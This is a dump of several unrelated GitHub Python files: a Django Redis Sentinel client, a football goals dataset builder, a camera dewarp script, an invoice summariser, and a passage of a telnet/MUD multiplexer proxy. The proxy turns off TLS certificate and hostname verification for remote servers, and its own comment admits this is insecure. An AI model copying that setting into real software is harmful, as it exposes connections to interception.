zipObj.extractall()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"agusrave/Coding-Challenge","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2305097352","text":"from ._dataset import *\nfrom ._types import *\n\nDATA_SETS = dict()\nfor spectrum in SpectrumType:\n DATA_SETS.update(\n {\n spectrum: Dataset.create(spectrum)\n }\n )\n\n\nclass Material(object):\n def __init__(self, plastic_type: Plastic):\n if not isinstance(plastic_type, Plastic):\n raise ValueError(f'Invalid type of plastic: {plastic_type} \\n '\n f'Supported plastic types: {[e.value for e in Plastic]}')\n self._plastic_type = plastic_type\n self._spectrum = dict()\n\n for spectrum_type in SpectrumType:\n self._spectrum.update(\n {\n spectrum_type: DATA_SETS[spectrum_type].get().loc[self._plastic_type.value].sample().iloc[0]\n }\n )\n\n def spectrum(self, spectrum_type: SpectrumType):\n return self._spectrum[spectrum_type]\n","repo_name":"mrrostam/rcplant","sub_path":"rcplant/_material.py","file_name":"_material.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29583701402","text":"from urllib.parse import urlparse, parse_qs, urlunparse, urlencode\n\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django_redis.client import DefaultClient\nfrom django_redis.pool import ConnectionFactory\nfrom redis.connection import to_bool\nfrom redis.sentinel import Sentinel, SentinelConnectionPool\n\n\nclass SentinelConnectionFactory(ConnectionFactory):\n def __init__(self, options):\n # allow overriding the default SentinelConnectionPool class\n options.setdefault(\"CONNECTION_POOL_CLASS\", \"redis.sentinel.SentinelConnectionPool\")\n super().__init__(options)\n\n sentinels = options.get(\"SENTINELS\")\n if not sentinels:\n raise ImproperlyConfigured(\"SENTINELS must be provided as a list of (host, port).\")\n\n # provide the connection pool kwargs to the sentinel in case it\n # needs to use the socket options for the sentinels themselves\n connection_kwargs = self.make_connection_params(None)\n connection_kwargs.pop(\"url\")\n connection_kwargs.update(self.pool_cls_kwargs)\n self._sentinel = Sentinel(\n sentinels,\n sentinel_kwargs=options.get(\"SENTINEL_KWARGS\"),\n **connection_kwargs,\n )\n\n def get_connection_pool(self, params):\n \"\"\"\n Given a connection parameters, return a new sentinel connection pool\n for them.\n \"\"\"\n url = urlparse(params[\"url\"])\n\n # explicitly set service_name and sentinel_manager for the\n # SentinelConnectionPool constructor since will be called by from_url\n cp_params = dict(params)\n cp_params.update(service_name=url.hostname, sentinel_manager=self._sentinel)\n pool = super().get_connection_pool(cp_params)\n\n # convert \"is_master\" to a boolean if set on the URL, otherwise if not\n # provided it defaults to True.\n is_master = parse_qs(url.query).get(\"is_master\")\n if is_master:\n pool.is_master = to_bool(is_master[0])\n\n return pool\n\n\ndef replace_query(url, query):\n return urlunparse((*url[:4], urlencode(query, doseq=True), url[5]))\n\n\nclass SentinelClient(DefaultClient):\n \"\"\"\n Sentinel client which uses the single redis URL specified by the CACHE's\n LOCATION to create a LOCATION configuration for two connection pools; One\n pool for the primaries and another pool for the replicas, and upon\n connecting ensures the connection pool factory is configured correctly.\n \"\"\"\n\n def __init__(self, server, params, backend):\n if isinstance(server, str):\n url = urlparse(server)\n primary_query = parse_qs(url.query, keep_blank_values=True)\n replica_query = dict(primary_query)\n primary_query[\"is_master\"] = [1]\n replica_query[\"is_master\"] = [0]\n\n server = [replace_query(url, i) for i in (primary_query, replica_query)]\n\n super().__init__(server, params, backend)\n\n def connect(self, *args, **kwargs):\n connection = super().connect(*args, **kwargs)\n if not isinstance(connection.connection_pool, SentinelConnectionPool):\n raise ImproperlyConfigured(\n \"Settings DJANGO_REDIS_CONNECTION_FACTORY or \"\n \"CACHE[].OPTIONS.CONNECTION_POOL_CLASS is not configured correctly.\"\n )\n\n return connection\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/utils/sentinel.py","file_name":"sentinel.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"15150802309","text":"# datasets options\r\n'''\r\n features --> Time, HomeTeam, AwayTeam, Referee, Home Time Shots on Target,\r\n Away Team Shots on Target, Kick efficiency(last season) --> Mean shots on target/Mean gols\r\n \r\n 1 option --> Predict the total gols (Regresion)\r\n \r\n 2 option --> Predict if total gols +- 2.5 (Classifier)\r\n \r\n -- Concatenate 2 years of the championship\r\n -- Focus in 1.5 classifier \r\n -- Create a new feature \r\n \r\n \r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom analyse_the_goals import df_gols, df_features, df_home_features, df_away_features\r\n# , df_gols_2, df_features_2,df_home_features_2, df_away_features_2\r\n\r\ndef data_1_option(data):\r\n return data[['DTO','Time','HomeTeam','AwayTeam','Referee','TG']]\r\n\r\ndef data_2_option(data, data_home_features, data_away_features):\r\n \r\n home_teams = data['HomeTeam'].values\r\n away_teams = data['AwayTeam'].values\r\n \r\n _kick_eff_home, _kick_eff_home_opp = [], []\r\n _kick_eff_away, _kick_eff_away_opp = [], []\r\n \r\n for team in home_teams: \r\n kick_eff = data_home_features[(data_home_features['team'] == team)]['Kick_eff'].values[0]\r\n kick_eff_opp = data_home_features[(data_home_features['team'] == team)]['Kick_eff_opp'].values[0]\r\n \r\n _kick_eff_home.append(kick_eff), _kick_eff_home_opp.append(kick_eff_opp)\r\n \r\n for team in away_teams:\r\n kick_eff = data_away_features[(data_away_features['team'] == team)]['Kick_eff'].values[0]\r\n kick_eff_opp = data_away_features[(data_away_features['team'] == team)]['Kick_eff_opp'].values[0]\r\n \r\n _kick_eff_away.append(kick_eff), _kick_eff_away_opp.append(kick_eff_opp)\r\n\r\n data['HKE'] = _kick_eff_home\r\n data['HKEP'] = _kick_eff_home_opp\r\n data['AHE'] = _kick_eff_away\r\n data['AKEP'] = _kick_eff_away_opp\r\n\r\n def classifier_gols(value):\r\n if value < 2.5:\r\n return 0.0\r\n else:\r\n return 1.0\r\n \r\n data['TG'] = data['TG'].apply(lambda value: classifier_gols(value))\r\n \r\n return data[['Time','HomeTeam','AwayTeam','Referee','HKE','HKEP','AHE','AKEP','TG']]\r\n\r\ndef concatenated_datas(data_1,data_2):\r\n return pd.concat([data_1,data_2])\r\n\r\n\r\n# df_1 = data_1_option(df_nf_c)\r\ndf_2 = data_2_option(df_features, df_home_features, df_away_features)\r\n# df_2_2 = data_2_option(df_features_2, df_home_features_2, df_away_features_2)\r\n\r\n# data_plus = concatenated_datas(df_2,df_2_2)","repo_name":"lgomesgl/Predict_gols","sub_path":"datasets_the_goals.py","file_name":"datasets_the_goals.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6243375648","text":"import cv2, thread, time, urllib\nimport numpy as np\nfrom PIL import Image\n\n# Frame size\nWs = 320\nHs = 240\n# Center of the donut\nCx = 157\nCy = 125\n# Inner donut radius\nR1 = 60\n# Outer donut radius\nR2 = 130\n\nuscita=False\n\n# Build the unwarp mapping\ndef buildMap(Ws,Hs,Wd,Hd,R1,R2,Cx,Cy):\n map_x = np.zeros((Hd,Wd),np.float32)\n map_y = np.zeros((Hd,Wd),np.float32)\n p2=2.0*np.pi\n pm=np.pi/2.0\n Rx=R2-R1\n for y in range(0,int(Hd-1)):\n for x in range(0,int(Wd-1)):\n r = (float(y)/float(Hd))*Rx+R1\n theta = (float(x)/float(Wd))*p2-pm\n xS = Cx+r*np.sin(theta)\n yS = Cy+r*np.cos(theta)\n map_x.itemset((y,x),int(xS))\n map_y.itemset((y,x),int(yS))\n return map_x, map_y\n\n# Do the unwarping \ndef unwarping(img,xmap,ymap):\n output = cv2.remap(img,xmap,ymap,cv2.INTER_LINEAR)\n return output\n \n# Get next video frame (cv2 format)\n# Uses mjpg-streamer to create the video stream\ndef GetFrame():\n req = urllib.urlopen('http://127.0.0.1:8080/?action=snapshot')\n arr = np.asarray(bytearray(req.read()), dtype=np.uint8)\n image = cv2.imdecode(arr,-1)\n return image\n\n# Output image size\nWd = 2.0*((R2+R1)/2)*np.pi\nHd = (R2-R1)\n# Build unwarping map\nxmap,ymap = buildMap(Ws,Hs,Wd,Hd,R1,R2,Cx,Cy)\n# First unwarp\nimg = GetFrame()\npanorama = unwarping(img,xmap,ymap)\n\ndef UnWarp():\n global xmap\n global ymap\n global panorama\n global uscita\n while True:\n img = GetFrame()\n panorama = unwarping(img,xmap,ymap)\n if (uscita):\n thread.exit()\n\ndef ExitUnwarp():\n uscita=True\n","repo_name":"mascalx/PiSpider","sub_path":"script/dewarp.py","file_name":"dewarp.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8911150826","text":"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom .import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('add_review/', views.add_review, name='add_review'),\n path('edit_review//', views.edit_review,\n name='edit_review'),\n path('delete_review_confirmation//',\n views.delete_review_confirmation,\n name='delete_review_confirmation'),\n path('delete_review//', views.delete_review,\n name='delete_review'),\n path('add_review_success/', views.add_review_success,\n name='add_review_success'),\n]\n","repo_name":"ACEGAZ/game-hunter","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24867894686","text":"import argparse\nimport json\nimport logging\nimport os\nimport xml.etree.ElementTree as etree\n\n\nparser = argparse.ArgumentParser(description=\"Read cfdis and show the resume\")\nparser.add_argument(\"-d\", \"--directory\", type=str, help=\"directory\")\n\nns = {\n \"cfdi\": \"http://www.sat.gob.mx/cfd/3\",\n \"nomina12\": \"http://www.sat.gob.mx/nomina12\",\n}\n\n\ndef main(dir_path):\n logging.info(f\"Read CFDI from {dir_path}\")\n emisor_dict = {}\n for month in range(1, 13):\n month_dir = f\"{dir_path}/{month:02d}/\"\n logging.info(month_dir)\n\n for file in os.listdir(month_dir):\n\n if file.endswith(\".xml\"):\n tree = etree.parse(f\"{month_dir}{file}\")\n root = tree.getroot()\n total = float(root.attrib.get(\"Total\"))\n emisor = root.find(\"cfdi:Emisor\", ns)\n emisor_name = emisor.attrib.get(\"Nombre\")\n emisor_rfc = emisor.attrib.get(\"Rfc\")\n total_cumulative = emisor_dict.get(emisor_rfc, {}).get(\n \"total\", 0\n )\n month_cumulative = emisor_dict.get(emisor_rfc, {}).get(\n f\"{month:02d}\", 0\n )\n if not emisor_dict.get(emisor_rfc):\n emisor_dict[emisor_rfc] = {}\n\n emisor_dict[emisor_rfc].update(\n {\n \"nombre\": emisor_name,\n \"total\": total + total_cumulative,\n f\"{month:02d}\": total + month_cumulative,\n }\n )\n print(json.dumps(emisor_dict, indent=4))\n\n\nif __name__ == \"__main__\":\n FORMAT = \"[%(asctime)s] [%(levelname)s] %(message)s\"\n logging.basicConfig(level=logging.INFO, format=FORMAT)\n args = parser.parse_args()\n main(args.directory)\n","repo_name":"pecalleja/sat-review","sub_path":"year_resume.py","file_name":"year_resume.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32423305753","text":"# vim: tabstop=3:shiftwidth=3:expandtab:autoindent\n\n# 'Telnet' multiplexer for MUDs, etc. Python 3.\n\n# Things we should be doing someday:\n# - actually understand the underlying protocols (Telnet) instead of just stripping\n# them out\n\nimport sys\nimport threading\nimport logging\nimport traceback\n\nimport socket\nimport ssl\nimport selectors\n\nimport json\n\nimport os\nimport hashlib\nimport getpass\nimport base64\n\nimport pkgutil\nimport importlib\n\nimport ansi\n\n\nCONFIG_FILE = 'config.json'\nPASSWORD_FILE = 'password.json' # Password hash is stored here\n\n\nENCODING = 'utf-8' # (default)\nLINE_SEPARATOR = 10 # (default) ASCII/UTF-8 newline\n\nCOMMAND_PREFIX = ','\nMESSAGE_PREFIX_OK = '%% '\nMESSAGE_PREFIX_ERR = '!! '\n\nRECV_MAX = 4096 # bytes\n\n# (defaults; change in config.json)\nBIND_TO_HOST = \"localhost\"\nBIND_TO_PORT = 1234\n\n# We want cfg to be global, but not to load it on module import.\ncfg = None\n\n\nlogging.basicConfig(level=logging.INFO)\n\n\n###\n### UTILITY FUNCTIONS\n###\n\n\ndef load_json(filename):\n try:\n with open(filename, 'r') as f:\n cfg = json.load(f)\n return cfg\n\n except FileNotFoundError:\n logging.info(\"Could not read JSON file {}\".format(filename))\n return None # ... we could just ignore it and let caller handle the\n # exception, but in this case since we're trying to *get\n # a value* it seems more appropriate to return no value\n # if there's nothing to get.\n\n\ndef save_json(data, filename):\n try:\n with open(filename, 'w') as f:\n json.dump(data, f, indent=3)\n\n except Exception as e:\n logging.error(\"Could not write JSON to file {}\".format(filename))\n raise e\n\n\n###\n### PASSWORD\n###\n\n# We want to make sure random people can't sneak in and access the proxy, even\n# if it's on a local-area network. We use a single password for this.\n\n# After reading some things, I chose to use...scrypt. I am not a cryptographer,\n# but it looked reasonable, it was in the Python standard library, and it seemed\n# possible it was more secure than sha256. It's unlikely this particular application\n# will be attacked by a serious password-cracker anyway, but you never really\n# know...\n\nclass Password:\n \"\"\"Stores a hashed user password using scrypt.\n\n When it is initialized, it will try to load the hash from a file; if it can't manage\n to do that, it will block on initialization to prompt the user for a new password\n (and try to persist that to the file.)\"\"\"\n def __init__(self):\n self.hashed = load_json(PASSWORD_FILE)\n if self.hashed is None:\n self.prompt_user_for_new_password()\n print(repr(self.hashed))\n save_json({k: base64.b64encode(v).decode('ascii') for k, v in self.hashed.items()}, PASSWORD_FILE)\n else:\n self.hashed = {k: base64.b64decode(v) for k, v in self.hashed.items()}\n\n def hash(self, password, salt):\n \"\"\"This function should return a bytes-like object containing the hash of 'password'\n given the salt 'salt'. The password argument should be a string.\"\"\"\n hashtype = cfg.get('password_hash_method', 'scrypt')\n\n if hashtype == 'scrypt':\n # https://blog.filippo.io/the-scrypt-parameters/ was used for a reference for\n # what these mean and what to set them to.\n return hashlib.scrypt(password.encode('utf8'), salt=salt, n=2 ** 15, r=8, p=1, maxmem=1024 * 1024 * 64)\n elif hashtype == 'pbkdf2':\n return hashlib.pbkdf2_hmac('sha256', password.encode('utf8'), salt, 1000000)\n else:\n raise ValueError(\"Invalid password-hashing method '{}'\".format(hashtype))\n\n def prompt_user_for_new_password(self):\n \"\"\"Prompt the user for a new password on the console and setup self to verify it later.\"\"\"\n salt = os.urandom(16)\n\n pw = None\n while pw is None:\n pw_one = getpass.getpass(prompt='No password to access the proxy has been set.\\nEnter one now: ')\n pw_two = getpass.getpass(prompt='Confirm password: ')\n\n if pw_two == pw_one:\n pw = pw_one\n\n self.hashed = {'salt': salt, 'hash': self.hash(pw, salt)}\n\n def verify(self, candidate_password):\n \"\"\"Check `candidate_password' (a string) against self; return whether it's right.\"\"\"\n if self.hashed is None:\n raise ValueError(\"Tried to check a password that doesn't exist.\")\n\n candidate = self.hash(candidate_password, self.hashed['salt'])\n if candidate == self.hashed['hash']:\n return True\n else:\n return False\n\n\n###\n### NETWORKING\n###\n\n\nclass TextLine:\n \"\"\"An abstract container for lines of text. This seemed like an important\n design element at one point, but it may not be nearly as important now.\"\"\"\n def __init__(self, string, encoding):\n assert type(string) == bytes or type(string) == str\n self.__enc = encoding\n\n self.set(string)\n\n def set(self, string):\n \"\"\"(Temporary method for testing.)\"\"\"\n if type(string) == bytes:\n self.__raw = string\n else:\n self.__raw = string.encode(self.__enc)\n\n def as_str(self):\n \"\"\"Try to 'safely', but lossily, decode the raw line into an ordinary string,\n according to the encoding given.\"\"\"\n s = \"\"\n r = self.__raw\n\n while len(r) > 0:\n try:\n s += r.decode(self.__enc)\n r = ''\n except UnicodeDecodeError as e:\n s += r[:e.start].decode(self.__enc)\n\n for byte in r[e.start:e.end]:\n s += '?(' + str(byte) + ')'\n\n r = r[e.end:]\n\n return s\n\n def as_bytes(self):\n return self.__raw\n\n\nclass LineBufferingSocketContainer:\n \"\"\"A base class that helps handle reading from and writing to a socket. The\n I/O is buffered to lines, and telnet control codes (i.e. IAC ...) are dropped.\n (Thus this class only works with servers that are willing to play dumb. But\n that's most servers, luckily for us.)\"\"\"\n def __init__(self, socket = None):\n self.__b_send_buffer = b''\n self.__b_recv_buffer = b''\n\n self.connected = False\n\n self.socket = None\n\n self.encoding = ENCODING\n self.linesep = LINE_SEPARATOR\n\n if socket != None:\n self.attach_socket(socket)\n\n def write_str(self, data):\n \"\"\"Write a string to the underlying socket.\"\"\"\n assert type(data) == str\n\n self.__b_send_buffer += data.encode(self.encoding)\n\n self.flush()\n\n def write_line(self, line):\n \"\"\"Write a TextLine to the underlying socket.\"\"\"\n assert type(line) == TextLine\n\n self.__b_send_buffer += line.as_bytes()\n\n self.flush()\n\n def write(self, data):\n \"\"\"Write some bytes to the underlying socket.\"\"\"\n assert type(data) == bytes\n\n self.__b_send_buffer += data\n\n self.flush()\n\n def flush(self):\n \"\"\"Send as much buffered input as the socket will allow, but only attempt to\n do so up to the end of the last complete line.\"\"\"\n assert self.socket != None\n assert self.connected\n\n while len(self.__b_send_buffer) > 0 and self.linesep in self.__b_send_buffer:\n try:\n t = self.__b_send_buffer.index(self.linesep)\n n_bytes = self.socket.send(self.__b_send_buffer[:t+1])\n self.__b_send_buffer = self.__b_send_buffer[n_bytes:]\n\n except (BlockingIOError, ssl.SSLWantReadError, ssl.SSLWantWriteError):\n logging.info(\"Note: BlockingIOError in flush() call\")\n break\n\n except OSError:\n logging.error(\"Got an OSError in flush() call\")\n break\n\n def read(self):\n \"\"\"Read as much data as the socket will provide. Returns a pair like `([list of TextLine's or empty],\n found_eof?)'. If found_eof? is true, the connection has probably died.\"\"\"\n assert self.connected\n assert self.socket != None\n\n has_eof = False\n\n try:\n data = b''\n while True:\n data = self.socket.recv(RECV_MAX)\n self.__b_recv_buffer += data\n if len(data) < RECV_MAX:\n # If the length of data returned by a read() call is 0, that actually means the\n # remote side closed the connection. If there's actually no data to be read,\n # you get a BlockingIOError or one of its SSL-based cousins instead.\n if len(data) == 0:\n has_eof = True\n break\n data = b''\n\n except (BlockingIOError, ssl.SSLWantReadError, ssl.SSLWantWriteError):\n pass\n\n except OSError:\n logging.error(\"Got an OSError in read() call\")\n\n except ConnectionResetError:\n has_eof = True\n\n q = []\n\n # Telnet codes are a problem. TODO: Improve this super hacky solution, which just involves\n # ... completely removing them from the input stream (except for IAC IAC / 255 255.)\n\n stripped = b''\n\n IAC = 255\n DONT = 254\n DO = 253\n WONT = 252\n WILL = 251\n\n in_command = False\n\n # Speaking of awful hacks, this is probably not very efficient at all:\n\n x = 0\n while x < len(self.__b_recv_buffer):\n if in_command:\n if self.__b_recv_buffer[x] == IAC:\n stripped += bytes([IAC])\n in_command = False\n elif self.__b_recv_buffer[x] <= DONT and self.__b_recv_buffer[x] >= WILL:\n pass\n else:\n # TODO: Figure out if there are Telnet codes that will be baffled by this\n # (are they all guaranteed to be 2 bytes long except for IAC XYZ?)\n in_command = False\n else:\n if self.__b_recv_buffer[x] == IAC:\n in_command = True\n else:\n stripped += self.__b_recv_buffer[x:x+1]\n x += 1\n\n # The best we can do for a record separator in this case is a byte or byte sequence that\n # means 'newline'. We go with one byte for now for simplicity & because it works with\n # UTF-8/ASCII at least, which comprises most things we're interested in.\n\n while self.linesep in stripped:\n t = stripped.index(self.linesep)\n q += [TextLine(stripped[:t+1], self.encoding)]\n stripped = stripped[t+1:]\n\n self.__b_recv_buffer = stripped\n\n # Make sure it starts in in_command mode again next time around in case the read() call\n # left us in the middle of a command, which I don't think is *likely* but could happen.\n # (The rest of the command will get tacked on after the IAC, which will ensure\n # the thing goes back into command mode immediately prior.)\n\n if in_command:\n self.__b_send_buffer += bytes([IAC])\n\n return (q, has_eof)\n\n def attach_socket(self, socket):\n \"\"\"Set up `self' to work with `socket'.\"\"\"\n socket.setblocking(False)\n self.socket = socket\n self.connected = True\n\n def handle_disconnect(self):\n \"\"\"Call this function when the remote end closed the connection to nullify and\n make false the appropriate variables.\"\"\"\n self.socket = None\n self.connected = False\n\n\nclass FilterSpecificationError(Exception):\n \"\"\"This Exception subclass is thrown when the user has made an errror specifying a\n filter or paramters for setting up said filter.\"\"\"\n pass\n\n\nclass FilteredSocket(LineBufferingSocketContainer):\n \"\"\"This class mostly extends LineBufferingSocketContainer with a list of filters and\n logic for setting it up from a specification.\"\"\"\n # Doesn't actually filter *itself* (yet?)\n # Would probably need to override some methods of the parent class.\n # (It may be impracticable to self-filter here anyway because the filters need to\n # know whether their text came from a server or a client and this class is too\n # abstract to know that. But this seemed like the best way to avoid code duplication.)\n def __init__(self):\n super().__init__()\n self.filters = []\n\n def add_filters(self, filters, prototypes):\n \"\"\"Add filters to self according to the specification in `filters` (same format as\n configuration file), drawing from the filter prototypes/classes in the dictinoary\n `prototypes`. Can raise FilterSpecificationError.\"\"\"\n\n if type(filters) != list:\n raise FilterSpecificationError(\"Filters must be specified as list of [name,opts] pairs\")\n\n for f in filters:\n if type(f) != list or len(f) != 2 or type(f[0]) != str or type(f[1]) != dict:\n raise FilterSpecificationError(\"Format to specify a filter is ['filtername',{'option':'val',...}]\")\n\n filter_name = f[0]\n filter_opts = f[1]\n\n if filter_name not in prototypes:\n raise FilterSpecificationError(\"No such filter `{}'\".format(filter_name))\n return\n\n filter_class = prototypes[filter_name]\n\n self.filters.append(filter_class(self, filter_opts))\n\n\nclass RemoteServer(FilteredSocket):\n \"\"\"Handles a connection to a remote server, something multiple clients can connect to.\"\"\"\n def __init__(self, host, port, name=\"\"):\n super().__init__()\n\n assert type(host) is str\n assert type(name) is str\n assert type(port) is int\n\n self.host = host\n self.port = port\n self.name = name\n\n self.subscribers = []\n\n self.connecting_in_thread = False\n self.use_SSL = False\n\n def handle_data(self, data):\n \"\"\"Called when some data has arrived and needs to be dispatched to the subscribers.\"\"\"\n for sub in self.subscribers:\n sub.write_line(data)\n\n def attach_socket(self, socket):\n \"\"\"Set up to use socket `socket'. Overridden to notify any filters when a server is connected.\"\"\"\n super().attach_socket(socket)\n\n for f in self.filters:\n try:\n f.server_connect(True)\n except AttributeError:\n pass\n\n def handle_disconnect(self):\n \"\"\"Called when the connection has been lost.\"\"\"\n super().handle_disconnect()\n for sub in self.subscribers:\n sub.tell_err(\"Remote server closed connection.\")\n\n for f in self.filters:\n try:\n f.server_connect(False)\n except AttributeError:\n pass\n\n def subscribe(self, supplicant):\n \"\"\"Add `supplicant' to the list of subscribed clients.\"\"\"\n assert type(supplicant) == LocalClient\n if supplicant not in self.subscribers:\n self.subscribers.append(supplicant)\n\n def unsubscribe(self, supplicant):\n \"\"\"Remove `supplicant' from the list of subscribed clients.\"\"\"\n assert type(supplicant) == LocalClient\n while supplicant in self.subscribers:\n self.subscribers.remove(supplicant)\n\n def tell_all(self, msg):\n \"\"\"Tell all the clients subscribed to this particular server of something.\"\"\"\n assert type(msg) == str\n for sub in self.subscribers:\n sub.tell_ok(msg)\n\n def warn_all(self, msg):\n \"\"\"Warn all the clients subscribed to this particular server about something.\"\"\"\n assert type(msg) == str\n for sub in self.subscribers:\n sub.tell_err(msg)\n\n\nclass LocalClient(FilteredSocket):\n def __init__(self, socket):\n super().__init__()\n\n self.attach_socket(socket)\n self.subscribedTo = None\n\n def tell_ok(self, msg):\n self.write_str(MESSAGE_PREFIX_OK + msg + \"\\r\\n\")\n\n def tell_err(self, msg):\n self.write_str(MESSAGE_PREFIX_ERR + msg + \"\\r\\n\")\n\n def unsubscribe(self):\n if type(self.subscribedTo) == RemoteServer:\n self.subscribedTo.unsubscribe(self)\n self.subscribedTo = None\n else:\n raise ValueError(\"client.unsubscribe when subscribedTo not a RemoteServer\")\n\n def subscribe(self, other):\n assert type(other) == RemoteServer\n self.subscribedTo = other\n\n def handle_data(self, data):\n if self.subscribedTo == None:\n self.tell_err(\"Not subscribedTo anything.\")\n return\n\n if self.subscribedTo.connected:\n self.subscribedTo.write_line(data)\n else:\n self.tell_err(\"Remote server not connected.\")\n\n def attach_socket(self, socket):\n # Overridden to notify things when a client is connected.\n super().attach_socket(socket)\n\n for f in self.filters:\n try:\n f.server_connect(True)\n except AttributeError:\n pass\n\n def handle_disconnect(self):\n super().handle_disconnect()\n\n if self.subscribedTo != None:\n self.subscribedTo.unsubscribe(self)\n\n for f in self.filters:\n try:\n f.client_connect(False)\n except AttributeError:\n pass\n\n\n###\n### PROXY\n###\n\n\nclass Proxy:\n def __init__(self, cfg):\n self.LOCK = threading.Lock()\n self.sel = selectors.DefaultSelector()\n self.socket_wrappers = {}\n\n self.tls_ctx_remote = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)\n self.tls_ctx_local = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)\n self.tls_ctx_remote.check_hostname = False\n # This is insecure and bad. IDEALLY everything would serve a correctly set up\n # certificate and it would Just Work. But ...\n self.tls_ctx_remote.verify_mode = ssl.CERT_NONE\n self.tls_ctx_local.load_cert_chain(\"ssl/cert.pem\")\n\n self.servers = {} # index of available servers by display name\n self.server_sockets = []\n\n self.client_sockets = []\n self.client_commands = {}\n\n self.unauthenticated_sockets = []\n self.password = Password()\n\n self.states = [(self.server_sockets, self.handle_line_server),\n (self.unauthenticated_sockets, self.handle_line_auth),\n (self.client_sockets, self.handle_line_client)]\n\n if cfg.get('debug', False):\n self.register_command(\"e\", self.do_client_debug)\n self.register_command(\"eval\", self.do_client_debug)\n self.register_command(\"debug\", self.do_client_debug)\n self.register_command(\"J\", self.do_client_connect)\n self.register_command(\"connect\", self.do_client_connect)\n self.register_command(\"j\", self.do_client_join)\n self.register_command(\"join\", self.do_client_join)\n self.register_command(\"drop\", self.do_client_drop)\n self.register_command(\"d\", self.do_client_drop)\n self.register_command(\"hush\", self.do_client_drop)\n self.register_command(\"h\", self.do_client_help)\n self.register_command(\"help\", self.do_client_help)\n self.register_command(\"die\", self.do_client_stop_everything)\n self.register_command(\"D\", self.do_client_stop_everything)\n\n self.cfg = cfg\n\n self.filter_prototypes = {}\n\n def register_command(self, cmdname, cmd):\n #assert type(cmd) == function\n if cmdname not in self.client_commands:\n self.client_commands[cmdname] = cmd\n else:\n logging.warning(\"Note: Attempt to overwrite command `{}' failed\".format(cmdname))\n\n def register_filter(self, name, impl):\n #assert exists impl.from_client, \"Error: `{}' filter implementation needs from_client()\".format(name)\n #assert exists impl.from_server, \"Error: `{}' filter implementation needs from_server()\".format(name)\n\n if name not in self.filter_prototypes:\n self.filter_prototypes[name] = impl\n else:\n logging.warning(\"Note: Attempted to overwrite filter type `{}' failed\".format(name))\n\n def wall(self, mesg):\n \"\"\"Warn every client with the string `mesg'.\"\"\"\n for socket in self.client_sockets:\n assert socket in self.socket_wrappers\n assert type(self.socket_wrappers[socket]) is LocalClient\n\n c = self.socket_wrappers[socket]\n c.tell_err(mesg)\n\n ###\n ### STATE: server\n ###\n\n def handle_line_server(self, socket, line):\n assert socket in self.server_sockets\n\n svr = self.socket_wrappers[socket]\n ln = line\n\n for f in svr.filters:\n try:\n ln = f.from_server(ln)\n except Exception:\n kind, value, t = sys.exc_info()\n logging.error(\"Error applying a server filter: {}\".format(repr(value)))\n logging.error(traceback.format_exc())\n\n if ln is None:\n return\n\n self.socket_wrappers[socket].handle_data(ln)\n return False # don't continue trying states\n\n def do_start_connection(self, server):\n logging.info(\"Starting to connect to server {}:{}.\".format(server.host, server.port))\n\n # This will always be ran in a thread -- to prevent long-blocking connection\n # attempts from hanging the whole program (e.g., when a server is down,\n # tinyfugue can spend quite a while waiting for a connection attempt to\n # come through...)\n\n # The main program will set connecting_in_thread synchronously *before*\n # calling this thread, so we don't need to worry about accidental multiple\n # connection attempts.\n\n # It would probably be better to try to figure out asynchronous connect() or\n # something eventually.\n\n try:\n assert type(server) == RemoteServer\n assert server.socket == None\n assert not server.connected\n\n rlock = False\n\n C = socket.create_connection((server.host, server.port))\n\n if server.use_SSL:\n C = self.tls_ctx_remote.wrap_socket(C)\n\n self.LOCK.acquire()\n rlock = True\n\n server.attach_socket(C)\n self.socket_wrappers[C] = server\n self.server_sockets += [C]\n self.sel.register(C, selectors.EVENT_READ)\n\n except ConnectionRefusedError:\n server.warn_all(\"Connection attempt failed: Connection refused\")\n\n except ssl.SSLError as e:\n server.warn_all(\"Connection attempt failed, SSL error: {}\", repr(e))\n\n except (socket.error, socket.herror, socket.gaierror, socket.timeout) as err:\n server.warn_all(\"Connection attempt failed, network error: {}\".format(repr(err)))\n\n except OSError as err:\n server.warn_all(\"Connection attempt failed, OSError: {}\".format(repr(err)))\n\n except Exception:\n kind, value, t = sys.exc_info()\n server.warn_all(\"Connection attempt failed, other error: {}\".format(repr(value)))\n logging.error(\"NON-SOCKET CONNECTION ERROR\\n===========================\\n\\n\" + traceback.format_exc())\n\n finally:\n server.connecting_in_thread = False\n if rlock:\n self.LOCK.release()\n return\n\n def start_connection(self, server):\n assert type(server) == RemoteServer\n\n if not server.connecting_in_thread and not server.connected:\n server.connecting_in_thread = True\n t_connect = threading.Thread(target = self.do_start_connection, args = [server])\n t_connect.start()\n return True\n else:\n return False\n\n ###\n ### STATE: unauthenticated client\n ###\n\n def handle_line_auth(self, socket, line):\n assert socket in self.unauthenticated_sockets\n\n s = line.as_str().replace('\\r\\n', '').replace('\\n', '')\n\n if self.password.verify(s):\n if cfg.get(\"warn_about_connections\", True):\n self.wall(\"A client has authorized itself.\")\n\n while socket in self.unauthenticated_sockets:\n 